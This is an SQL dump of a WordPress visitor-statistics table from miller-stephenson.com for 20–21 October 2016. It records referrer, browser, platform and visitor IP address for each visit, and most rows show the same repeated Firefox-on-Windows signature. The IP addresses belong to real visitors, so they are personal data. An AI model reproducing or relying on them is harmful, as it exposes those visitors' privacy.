INSERT INTO `wp_statistics_visitor` VALUES (8794, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '193.77.45.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8795, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '208.113.160.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8796, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.92.254.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8797, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.50.196.161', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8798, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.55.188.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8799, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.61.162.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8800, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '68.206.156.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8801, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '42.112.236.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8802, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.142.139.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8803, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.217.54.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8804, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.149.81.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8805, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.140.235.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8806, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.244.225.38', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8807, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.135.139.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8808, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.193.139.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8809, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.61.160.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8810, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.46.22.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8811, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '205.158.218.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8812, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.142.242.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8813, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.220.21.38', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8814, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.46.150.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8815, '2016-10-20', 'https://www.google.ca/', 'Chrome', 'Windows', '50.0.2661.102', '', '108.171.135.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8816, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '128.199.254.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8817, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.208.14.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8818, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.94.218.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8819, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '218.232.15.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8820, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.171.91.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8821, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.41.117.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8822, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '32.211.126.221', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8823, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.150.24.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8824, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '70.239.84.163', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8825, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.95.38.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8826, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.254.109.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8827, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.23.67.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8828, '2016-10-20', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '175.205.13.173', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8829, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8830, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '164.215.28.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8831, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.151.97.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8832, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.93.12.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8833, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.182.91.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8834, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.107.132.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8835, '2016-10-20', 'https://www.miller-stephenson.com/product/epon-828/', 'Chrome', 'Android', '53.0.2785.124', '', '70.209.134.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8836, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.232.39.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8837, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.6.222.255', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8838, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.249.94.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8839, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.135.28.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8840, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.12.43.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8841, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.37.158.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8842, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.32.126.192', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8843, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.66.24.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8844, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '113.59.209.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8845, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.40.100.160', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8846, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '171.6.244.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8847, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.26.99.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8848, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.234.133.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8849, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '218.102.165.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8850, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.240.20.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8851, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.154.152.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8852, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '113.193.145.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8853, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '131.255.225.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8854, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.28.88.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8855, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.247.80.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8856, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.142.72.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8857, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.136.108.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8858, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.245.35.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8859, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.68.11.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8860, '2016-10-20', 'https://www.miller-stephenson.com/contact/', 'Safari', 'iPhone', '10.0', '', '71.57.154.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8861, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.47.64.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8862, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.208.130.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8863, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.75.202.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8864, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.160.39.208', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8865, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.106.7.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8866, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.158.135.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8867, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.107.46.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8868, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.81.128.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8869, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.103.106.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8870, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.206.223.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8871, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.93.77.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8872, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '157.50.124.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8873, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.222.188.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8874, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.48.13.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8875, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.100.87.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8876, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.87.79.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8877, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.237.217.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8878, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.25.23.93', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8879, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.99.220.219', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8880, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '113.21.68.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8881, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.6.110.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8882, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.251.243.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8883, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.84.240.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8884, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.150.80.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8885, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.10.65.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8886, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.75.33.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8887, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.58.34.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8888, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.71.178.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8889, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.165.193.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8890, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.132.148.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8891, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.103.112.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8892, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.246.204.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8893, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.107.225.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8894, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '96.20.183.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8895, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.228.114.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8896, '2016-10-20', 'https://lamboclone.com/index.php?topic=317.0', 'Safari', 'Macintosh', '9.1.3', '', '76.14.73.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8897, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.99.163.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8898, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.92.86.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8899, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '174.209.13.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8900, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '72.189.111.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8901, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.132.44.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8902, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '50.0.2661.89', '', '70.211.17.221', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8903, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.252.46.31', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8904, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.7.246.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8905, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '65.41.178.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8906, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '146.255.160.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8907, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.75.100.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8908, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '148.103.9.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8909, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.101.46.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8910, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.211.141.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8911, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.228.214.197', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8912, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.214.6.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8913, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.178.144.39', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8914, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.89.46.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8915, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.1.33.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8916, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.164.7.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8917, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.70.127.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8918, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.237.59.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8919, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.142.162.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8920, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8921, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.228.154.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8922, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.150.168.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8923, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8924, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.222.207.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8925, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '203.75.213.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8926, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.50.203.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8927, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.41.203.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8928, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.45.91.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8929, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.252.200.242', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8930, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.96.163.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8931, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.43.241.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8932, '2016-10-21', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '75.131.19.82', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8933, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.7.196.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8934, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.248.181.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8935, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.241.29.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8936, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.215.94.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8937, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.168.186.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8938, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.228.214.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8939, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.54.56.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8940, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.254.245.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8941, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.104.236.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8942, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.134.5.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8943, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.48.120.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8944, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.169.173.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8945, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.171.1.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8946, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.128.10.97', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8947, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.254.56.126', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8948, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.254.41.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8949, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.177.187.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8950, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.0.172.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8951, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.5.38.172', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8952, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.59.72.249', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8953, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.158.210.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8954, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.186.147.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8955, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.145.153.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8956, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '143.176.238.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8957, '2016-10-21', 'https://www.miller-stephenson.com/wp-admin/admin.php?page=quoteup-details-new', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 6, 0); 
